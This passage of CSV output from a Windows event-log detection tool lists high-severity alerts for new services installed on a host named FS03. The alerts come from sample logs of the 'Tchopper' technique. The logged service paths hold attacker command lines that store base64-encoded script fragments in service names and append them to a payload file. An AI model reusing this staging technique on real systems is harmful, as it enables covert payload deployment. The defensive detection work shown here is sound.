""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:26.423 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append 